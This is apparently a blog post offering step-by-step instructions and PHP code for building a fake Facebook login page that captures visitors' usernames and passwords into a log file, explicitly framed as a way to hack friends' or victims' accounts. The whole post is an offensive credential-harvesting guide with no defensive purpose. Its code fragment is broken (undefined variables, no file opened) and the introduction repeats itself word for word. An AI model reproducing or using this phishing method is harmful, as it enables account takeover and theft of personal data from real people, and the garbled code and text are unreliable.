Facebook Phishing Site Code

Phishing is the technique to create similar type of web-page of the existing web-page. Phishing is a type of attack where the intruders disguising as trustworthy agents attempt to gain your personal information such as passwords, credit card numbers or any other information.

In my previous post, I explain the easy method to hack Facebook, WhatsApp, Instagram, etc.So you need to read my previous post because this was read the article, and now many of my friends ask me for email that “How to hack Facebook id using phishing attack” because it is the most powerful trick to get your username and password for any of your victims or your Facebook friend account. This tool does not work properly now as it is outdated but let me share with you another tool using which you can create fake login page of popular websites like facebook, Instagram, Google etc. Creating fake login page is called as phishing. Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft. In my previous post, I explain the easy method to hack Facebook, WhatsApp, Instagram, etc.So you need to read my previous post because this was read the article, and now many of my friends ask me for email that “How to hack Facebook id using phishing attack” because it is the most powerful trick to get your username and password for any of your victims or your Facebook friend account.


Steps to Create Facebook Phishing Page:

  • Open facebook login page in your browser.
  • Press ctrl+U to find source code.
  • Copy whole source code and create a PHP file (index.php) and paste it.
  • Now, search for string methode='POST', it will give you two results first for login and second for register.
  • Next, replace the action file name as “xyz.php” in the login form.
  • Now create a file “xyz.php” and “log.txt” and paste below code in “xyz.php”.

    File name: xyz.php

    header ('Location: http://www.facebook.com');
    // Open the text file in writing mode
    fwrite($file, $variable);
    fwrite($file, $value);
    fwrite($file, 'rn');
  • Now you are done, share the page and if anyone will enter username and password then it will save into log.txt file.

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Phishing Page For Facebook